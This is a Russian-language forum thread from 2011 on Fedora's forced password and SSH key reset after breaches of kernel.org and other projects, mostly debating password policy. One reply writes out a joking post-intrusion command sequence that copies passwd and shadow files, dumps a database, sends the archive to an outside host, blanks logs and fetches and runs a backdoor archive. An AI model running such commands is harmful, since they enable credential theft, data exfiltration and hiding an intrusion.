The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Проект Fedora инициирует принудительную смену паролей и ssh-..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от opennews (??) on 13-Окт-11, 00:43 
Администраторы инфраструктуры проекта Fedora объявили (http://lists.fedoraproject.org/pipermail/announce/2011-Octob...) о намерении сменить все пароли доступа и SSH-ключи для аккаунтов во всех сервисах проекта. Аккаунты для которых до 30 ноября не будет произведена смена пароля будут заблокированы. Отмечается, что подобный шаг является мерой предосторожности и не связан с компрометацией или обнаружением уязвимости в элементах инфраструктуры.

Не скрывается, что опасения связаны с произошедшими за последние месяцы взломами крупных открытых проектов (kernel.org (http://www.opennet.me/opennews/art.shtml?num=31651), linuxfoundation.org, linux.com (http://www.opennet.me/opennews/art.shtml?num=31726), winehq.org (http://www.opennet.me/opennews/art.shtml?num=32013), mysql.com (http://www.opennet.me/opennews/art.shtml?num=31862)), произошедшими вследствие (http://www.opennet.me/opennews/art.shtml?num=31922) утечки параметров аутентификации у их участников. Кроме смены параметров а...

URL: http://lists.fedoraproject.org/pipermail/announce/2011-Octob...
Новость: http://www.opennet.me/opennews/art.shtml?num=32026

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +22 +/
Сообщение от Аноним (??) on 13-Окт-11, 00:43 
Всё верно, учатся на чужих ошибках.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

18. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от anonymous (??) on 13-Окт-11, 08:38 
Все никак не пойму они прикидываются или как ?
Любому видно что ЭТО банальный человеческий фактор !
И смена паролей ничего не даст..... ( почти ;) )
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

19. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +2 +/
Сообщение от Аноним (??) on 13-Окт-11, 09:31 
На основании чего ты делаешь подобное заявление? Ты - Брюс Шнайер?

В СОни тоже был человеческий фактор?

Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

24. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от dry (ok) on 13-Окт-11, 09:45 
Брюс Шнайер таких глупостей не говорит. Не надо клепать на уважаемого человека. :)
Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

45. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Аноним (??) on 13-Окт-11, 15:21 
> На основании чего ты делаешь подобное заявление?

На основании банальной статистики. Больше человек — больше вероятность ошибки. В свободных проектах куча разработчиков причём они сидят не в одном офисе и контролировать что они делают ещё на своём компьютере и что запускают — невозможно.

Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

4. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  –2 +/
Сообщение от aaa (??) on 13-Окт-11, 01:37 
вместо того, чтоб искустно раставить сеть для злаумышлеников, они решили отбежать подальше...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

5. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Andrew Kolchoogin on 13-Окт-11, 01:51 
Они -- кодеры, а не Супергерои.
Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

21. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  –3 +/
Сообщение от Аноним (??) on 13-Окт-11, 09:32 
> Они -- кодеры, а не Супергерои.

Они - кодеры, а по НОРМАЛЬНЫМ методикам разработки в команде КОДЕРОВ должен быть АДМИНИСТРАТОР БЕЗОПАСНОСТИ. Это очевидно всем, только не кодерам.

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

28. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от umbr (ok) on 13-Окт-11, 10:25 
>должен быть АДМИНИСТРАТОР БЕЗОПАСНОСТИ

Они надеются на лучшее :)

Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

39. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Аноним (??) on 13-Окт-11, 15:10 
>>должен быть АДМИНИСТРАТОР БЕЗОПАСНОСТИ
> Они надеются на лучшее :)

Лучшее произошло с кернелюорг.

Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

35. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от szh (ok) on 13-Окт-11, 13:37 
Перечисли поименно кого ты считаешь за кодеров, и как ты выяснил про каждого из них что он не "АДМИНИСТРАТОР БЕЗОПАСНОСТИ".
Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

38. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  –1 +/
Сообщение от Аноним (??) on 13-Окт-11, 15:09 
Пошел ты. Назови лучше поименно ТЫ состав проектной команды - хотя бы одной - и ткни среди них пальцем в АДМИНИСТРАТОРА БЕЗОПАСНОСТИ.
Ответить | Правка | ^ к родителю #35 | Наверх | Cообщить модератору

48. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от szh (ok) on 13-Окт-11, 16:55 
ты их обвиняешь, тебе и называть
Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

53. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +1 +/
Сообщение от crypt (??) on 13-Окт-11, 17:31 
opennet становится похож на habr: стот кому-то высказать конструктивную критику, его сходу минусуют. Конечно, столько пафоса и большими буквами не надо, но один толковый админ просто необходим, это факт. Я живу в глухой российской деревне и здесь обычная картина, когда молодой стартап вырастает и программер понимают, что им нужен отдельный админ. В глазах уже сливаются эти маленькие конторки, с одними и теми же детскими проблемами:  один большой сервер с кучей сервисов, 10 юзеров и все судоеры, неправильно спланирована сеть, нужен policy routing и проч.
Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

55. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Аноним (??) on 13-Окт-11, 17:48 
То, что выше к Fedora не относится. После того, как их взломали в 2000-каком-то они ввели двухфакторную аутентификацию.

http://www.yubico.com/fedora-uses-yubikey-for-strong-two-fac...-

Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

7. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от pavlinux (ok) on 13-Окт-11, 02:38 
Всех не переловишь. Да и у них там этим АНБ/ФБР занимается.
Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

32. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от konst email(??) on 13-Окт-11, 13:13 
да ловить-то кого? Честных людей взломали :). Интереснее было бы проследить, что именно делают эти "взломщики" на сервере...
Но для этого 1-3 админов маловато будет :(
Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

34. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  –1 +/
Сообщение от pavlinux (ok) on 13-Окт-11, 13:34 
> да ловить-то кого? Честных людей взломали :).
> Интереснее было бы проследить, что именно делают эти "взломщики" на сервере...

# mkdir -p /usr/share/man/manX/
# cp -a /etc/passwd  /usr/share/man/manX/passwd.X
# cp -a /etc/passwd  /usr/share/man/manX/shadow.X
# mysqldump > /usr/share/man/manX/mysql.X
# tar -cf /tmp/-X0.tmp /usr/share/man/manX/
# scp /tmp/-X0.tmp admin@root.org:
# rm -rf  /tmp/-X0.tmp /usr/share/man/manX/*;
# mysql
  INSERT INTO secret.user ...
# find /var/log -type f -exec echo " " > {} \;

# cd /tmp; wget http://super-puper.f00cking.trojan.org/backdoors.tgz
# tar -xvf backdoors.tgz; cd backdoors; make all; ./run.sh;

ну и так далее.

Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

36. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от konst email(??) on 13-Окт-11, 14:26 
>[оверквотинг удален]
> # mysqldump > /usr/share/man/manX/mysql.X
> # tar -cf /tmp/-X0.tmp /usr/share/man/manX/
> # scp /tmp/-X0.tmp admin@root.org:
> # rm -rf  /tmp/-X0.tmp /usr/share/man/manX/*;
> # mysql
>   INSERT INTO secret.user ...
> # find /var/log -type f -exec echo " " > {} \;
> # cd /tmp; wget http://super-puper.f00cking.trojan.org/backdoors.tgz
> # tar -xvf backdoors.tgz; cd backdoors; make all; ./run.sh;
> ну и так далее.

Это здорово. Но вопрос: как получить root на kernel.org (там ведь обновления проходят регулярно)?

Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

54. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от crypt (??) on 13-Окт-11, 17:35 
Интересно, расскажут ли об этом когда-нибудь...
Ответить | Правка | ^ к родителю #36 | Наверх | Cообщить модератору

68. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от MrClon on 18-Окт-11, 12:32 
> Это здорово. Но вопрос: как получить root на kernel.org (там ведь обновления
> проходят регулярно)?

На сайте — да, регулярно свежие ядра выкладывают (:
А вот на серверах какой-то старенький дистр, проскакивала где-то такая инфа.

Ответить | Правка | ^ к родителю #36 | Наверх | Cообщить модератору

33. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от szh (ok) on 13-Окт-11, 13:29 
они работают над проэктом Федора а не над расставлением сетей для злоумышленников которых там вероятно нет.
Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

49. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от anonymous (??) on 13-Окт-11, 17:00 
Почему Вы думаете, что они её не расставили?
Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

8. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +1 +/
Сообщение от pavlinux (ok) on 13-Окт-11, 02:42 
> от 20 букв в нижнем регистре.

Я уже знаю 2 пароля - internationalizationab, internationalizationabc :)


Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

9. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Аноним (??) on 13-Окт-11, 03:11 
И где тут смесь регистров и знаки препинания? Хотя конечно если всю фразу вводить - сойдет :)). Но столько печатать будет утомительно.
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

12. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от upyx (ok) on 13-Окт-11, 06:12 
Такие длинные пароли не только тяжело подобрать их еще и лень вводить.
Когда люди привыкают часто вводить пароль, они начинают их вводить бездумно на любой запрос. С действительно длинным паролем срабатывает рефлекс: "А может не надо?", и бывает, что действительно не надо...

Это как противоположность системы безопасности в Win, где на изменения появляются предупреждения. Но эти предупреждения появляются так часто, а нажать кнопочку "Ага" так просто, что пользователи начинают их тыкать автоматически (ну кроме редких педантов).

Длинные и сложные пароли - всегда хорошая практика.

Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

14. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от pavlinux (ok) on 13-Окт-11, 06:25 
Ну на кой ты это все тут нагенерил?!
---

Шутка юмора была про пароли из 20 нижнерегистровых букав и
про какое первое слово, в котором около 20 букав, придёт в мозг.
Моя утверждает что многим придёт в голову слово internationalization.

Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

26. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Анон on 13-Окт-11, 09:56 
Да, помню на хабре недавно публиковали хороший алгоритм подбора паролей. В легкую брутились пароли вроде васяйцукен123 и даже куда более сложные на первый взгляд (до 4х простых составных частей) так что длина пароля сама по себе мало уже что значит
Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

29. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от anonymous (??) on 13-Окт-11, 11:07 
Несусветная глупость. Хаксоры локалхоста взламывают пароли проникая взглядом под черепную коробку пользователя, без применения технических средств.

Те, кто использует пароли "777" и "пароль" умрут, но продолжат их использовать. Для остальных
>длина пароля сама по себе мало уже что значит

как раз длина пароля много чего значит.

Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

41. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Аноним (??) on 13-Окт-11, 15:11 
> Несусветная глупость. Хаксоры локалхоста взламывают пароли проникая взглядом под черепную
> коробку пользователя, без применения технических средств.
> Те, кто использует пароли "777" и "пароль" умрут, но продолжат их использовать.
> Для остальных
>>длина пароля сама по себе мало уже что значит
> как раз длина пароля много чего значит.

Не трать порох. Этот недоумок никогда не слышал ни о пространсте перебора, ни о атаке по словарям.

Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

47. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Аноним (??) on 13-Окт-11, 15:27 
> как раз длина пароля много чего значит.

Если пароль составлен как комбинация нескольких более-менее общеизвестных слов/цифр, он выглядит секурно (с длиной - порядок), но на самом деле - брутфорсится довольно быстро. Потому что слов придуманных человечеством сильно меньше чем 256^20 например (число вариантов в идеале для 20-символьного пароля). Перебрать комбинации 2-3 слов и даже с наиболее типовыми мутациями - вполне реальная задача, особенно если хещи паролей крякать.

Поэтому сам факт что у тебя 20-символьный пароль еще вовсе не гарантирует что его завтра не сломает какой-то Пупкин. Чтобы Пупкин его натурально не сломал, он еще и должен быть более-менее честным рандомом. Запоминать 20 более-менее рандомных символов может задолбаться и сам обладатель пароля...

Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

60. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Аноним (??) on 13-Окт-11, 23:07 
Комбинации из 2-3 слов хорошо разбавляются разными символами  и циферками, а ещё слова можно не писать полностью. Всё это довольно сильно разбавляет общеупотребимый набор слов.
Другое дело, что всех этих паролей и прочей подобной информации появляется много и всего запомнить невозможно. А раз так, то значит есть списки, а к спискам мастер пароль. Наличие мастер пароля я считаю это плохой идеей в принципе, тут нужен другой подход.
Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

13. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от upyx (ok) on 13-Окт-11, 06:24 
>> от 20 букв в нижнем регистре.
> Я уже знаю 2 пароля - internationalizationab, internationalizationabc :)

Пример паролей от 20 букв подбирающихся за 20 минут?

Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

15. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  –1 +/
Сообщение от pavlinux (ok) on 13-Окт-11, 06:27 
>>> от 20 букв в нижнем регистре.
>> Я уже знаю 2 пароля - internationalizationab, internationalizationabc :)
> Пример паролей от 20 букв подбирающихся за 20 минут?

Кто ж тебе даст подбирать 20 минут.

Три неверных - минуту куришь, ещё три - ещё три куришь, потом ещё три - уже полчаса отдыхай.


Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

16. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +1 +/
Сообщение от upyx (ok) on 13-Окт-11, 07:25 
>>>> от 20 букв в нижнем регистре.
>>> Я уже знаю 2 пароля - internationalizationab, internationalizationabc :)
>> Пример паролей от 20 букв подбирающихся за 20 минут?
> Кто ж тебе даст подбирать 20 минут.
> Три неверных - минуту куришь, ещё три - ещё три куришь, потом
> ещё три - уже полчаса отдыхай.

Да, да, а потом вообще пошлет на страницу капчу расшифровывать и на глупые вопросы отвечать...
Я имел ввиду подбор по хэшу. Его продолжительность должна быть дольше, чем время за которое станет известно, что хеш увели. А еще паронаидальнее исходить из предположения, что хеш всегда общедоступен и время подбора должно быть больше времени жизни пароля. :-)

К чему я это написал? Может быть к тому, что "интернационализация" - далеко не первое, что пришло мне в голову... ;-)

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

37. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от BliecanBag (ok) on 13-Окт-11, 14:37 
>> от 20 букв в нижнем регистре.
> Я уже знаю 2 пароля - internationalizationab, internationalizationabc :)

я знаю еще лучше: echo parol | sha512sum

Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

42. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Аноним (??) on 13-Окт-11, 15:12 
>>> от 20 букв в нижнем регистре.
>> Я уже знаю 2 пароля - internationalizationab, internationalizationabc :)
> я знаю еще лучше: echo parol | sha512sum

Зря так думаешь. Зная алгоритм хэширования - если без соли - легко провести словарную атаку, при таком говенном пароле.

Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору

52. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от анонимус (??) on 13-Окт-11, 17:31 
Rindfleischetikettierungsüberwachungsaufgabenübertragungsgesetz
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

17. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +1 +/
Сообщение от Аноним (??) on 13-Окт-11, 08:08 
В сурьезных конторах пароли положено раз в месяц менять для профилактики.
И при любом подозрении на взлом или утечку.
Все правильно сделали.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

20. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Fomalhaut on 13-Окт-11, 09:32 
А вот интересно, как в таких конторах меняют пароли аккаунтов, от которых работают сервисы и пр.
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

22. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Аноним (??) on 13-Окт-11, 09:34 
> А вот интересно, как в таких конторах меняют пароли аккаунтов, от которых
> работают сервисы и пр.

А это кодеры сервисов должны предусматривать. Теоретически. Потому что в нормальных системах сервисные аккаунты заблокированы или заэкспайрены.

Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

25. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +2 +/
Сообщение от zazik (ok) on 13-Окт-11, 09:48 
> А вот интересно, как в таких конторах меняют пароли аккаунтов, от которых
> работают сервисы и пр.

В таких конторах не держат винду, поэтому учётка выглядит так:
freeradius:*:133:133::0:0:FreeRADIUS Daemon:/nonexistent:/usr/sbin/nologin

Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

50. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от anonymous (??) on 13-Окт-11, 17:03 
> А вот интересно, как в таких конторах меняют пароли аккаунтов, от которых
> работают сервисы и пр.

Зачем на системные аккаунты ставить пароли?

Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

23. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +4 +/
Сообщение от Аноним (??) on 13-Окт-11, 09:41 
> В сурьезных конторах пароли положено раз в месяц менять для профилактики.

И сотрудники хранят эти пароли прикрепленными бумажками к монитору или ставят примитивные пароли типа 123a, 123b...123z, потому что не реально каждый месяц запоминать новый пароль.  Типичный пример заблуждений в политике безопасности.


Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

27. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +11 +/
Сообщение от Аноним (??) on 13-Окт-11, 10:14 
Однажды Сисадмин пожаловался Учителю:
– Мы выдали всем нашим пользователям индивидуальные пароли, а они не желают хранить их в тайне. Записывают на листочках и приклеивают к мониторам. Что нам делать? Как заставить их?
Инь Фу Во спросил:
– Сначала скажи, почему они это делают.
Сисадмин подумал и ответил:
– Может быть, они не считают пароль ценным?
– А разве пароль сам по себе ценный?
– Не сам по себе. Ценна информация, которая под паролем.
– Для кого она ценна?
– Для нашего предприятия.
– А для пользователей?
– Для пользователей, видимо, нет.
– Так и есть, – сказал Учитель. – Под паролем нет ничего ценного для наших работников. Надо, чтоб было.
– Что для них ценно? – спросил Сисадмин.
– Догадайся с трёх раз, – рассмеялся Учитель.
Сисадмин ушёл просветлённый и сделал на корпоративном портале персональные странички для всех работников. И на тех страничках был указан размер зарплаты. Узнав об этом, все пользователи забеспокоились о своих паролях. На другой день в курилке обсуждали размер зарплаты Главбуха. На третий день ни у кого не было видно листочков с паролями.
Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

30. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Crazy Alex (ok) on 13-Окт-11, 12:31 
Притча зантяная, но тогда просто включится второй вариант - смена пароля по какому-то примитивному алгоритму. Потому что каждый месяц новый запоминать таки никто не будет.
Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

40. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  –1 +/
Сообщение от Харитон email on 13-Окт-11, 15:10 
еще как будет! Все зависит от подачи пароля...
например если в случае с притчей доделать сайт так, что сумма зрплаты каждую минуту падает на 1дол. а восстановить базовую сумму можно зайдя на страничку. А в момент выдачи ЗП бух смотрит на сумму на страничке и выдает ту сумму какая есть на страничке.
Для особо рьяных по хождению на страничку - премия 5 дол.
После этого будут каждые 2 дня новый пароль из 20 символов(не букв) выучивать за нефиг делать...
Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

57. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +1 +/
Сообщение от iZEN (ok) on 13-Окт-11, 19:24 
> После этого будут каждые 2 дня новый пароль из 20 символов(не букв) выучивать за нефиг делать...

Сомневаюсь. Я бы с такой работы уволился — моя голова не ящик для паролей.

Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

31. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от pavlinux (ok) on 13-Окт-11, 12:50 
> Однажды Сисадмин пожаловался Учителю:
> – Мы выдали всем нашим пользователям индивидуальные пароли, а они не желают
> хранить их в тайне. Записывают на листочках и приклеивают к мониторам.
> Что нам делать? Как заставить их?
> Инь Фу Во спросил:
> – Сначала скажи, почему они это делают.

Потому, что у них есть бумажки.

Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

43. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Аноним (??) on 13-Окт-11, 15:14 
>> Однажды Сисадмин пожаловался Учителю:
>> – Мы выдали всем нашим пользователям индивидуальные пароли, а они не желают
>> хранить их в тайне. Записывают на листочках и приклеивают к мониторам.
>> Что нам делать? Как заставить их?
>> Инь Фу Во спросил:
>> – Сначала скажи, почему они это делают.
> Потому, что у них есть бумажки.

Потому что у них нет межушного ганглия.

Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

61. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от anonymous vulgaris on 14-Окт-11, 01:12 
> – Сначала скажи, почему они это делают.
>Потому, что у них есть бумажки.

Потому, что пароль он в основном от внешнего вторжения, а не от соседа слева

Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

63. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от pavlinux (ok) on 14-Окт-11, 04:39 
>> – Сначала скажи, почему они это делают.
>>Потому, что у них есть бумажки.
> Потому, что пароль он в основном от внешнего вторжения, а не от
> соседа слева

При этом 99% всех краж данных, паролей, вторжений исходит от внутренних сотрудников.

Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

46. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от vle email(ok) on 13-Окт-11, 15:23 
ТРИЗ в действии :-)
Похоже, автор этого анекдота -- ученик Альтшулера.
Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

58. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от kholeg email(ok) on 13-Окт-11, 20:35 
Подтвеждаю! Работаю на Сименсе - пароли меняются регулярно, и простой пароль типа 123456 не введёшь, и запоминает последние 5 или 7 паролей - приходится импровизировать.
О,о - не знал, что в таких крупных проектах, как Fedora, не сделана принудительная, регулярная смена пароля :-(
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

62. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  –1 +/
Сообщение от anonymous vulgaris on 14-Окт-11, 01:14 
> Подтвеждаю! Работаю на Сименсе - пароли меняются регулярно, и простой пароль типа
> 123456 не введёшь, и запоминает последние 5 или 7 паролей -  приходится импровизировать.

Что в крупных компаниях маразм крепок известно хорошо. Это потому что манагеров там много.

Ответить | Правка | ^ к родителю #58 | Наверх | Cообщить модератору

51. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Одинокий Админ on 13-Окт-11, 17:29 
Интерестно, а ты знаешь что такое ТРИЗ? Наверное ты динозавр как и я.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

56. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Аноним (??) on 13-Окт-11, 19:18 
Сдается мне что у них был взлом - и они пытаются прикрыться чужими что бы не марать свое имя.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

59. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Аноним (??) on 13-Окт-11, 23:06 
>Сдается мне что у них был взлом - и они пытаются прикрыться чужими что бы не марать свое имя.

Сдается мне, это все мировой заговор. А во главе - Столман и Торвальдс. Они хотят захватить мир и убить всех человеков, не иначе.

Ответить | Правка | ^ к родителю #56 | Наверх | Cообщить модератору

65. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Аноним (??) on 14-Окт-11, 08:26 
да? просто у fedora был уже взлом инфраструктуры... если официально объявить о еще одном - это расписаться в своем невежестве. А так - очень даже..
Ответить | Правка | ^ к родителю #59 | Наверх | Cообщить модератору

64. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от perchibald (ok) on 14-Окт-11, 07:39 
"Безопасность — это процесс, а не результат" (C)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

66. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Аноним (??) on 14-Окт-11, 22:40 
Ядро надо менять, ядро! А не пароли.

Если ядро позволяет повысить привилегии простого пользователя до рута, а разработчики ядра вместо исправления ошибки запрещают ssh-доступ, то менять надо ядро.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

67. "Проект Fedora инициирует принудительную смену паролей и ssh-..."  +/
Сообщение от Aquarius (ok) on 15-Окт-11, 14:48 
предложи альтернативу
Ответить | Правка | ^ к родителю #66 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру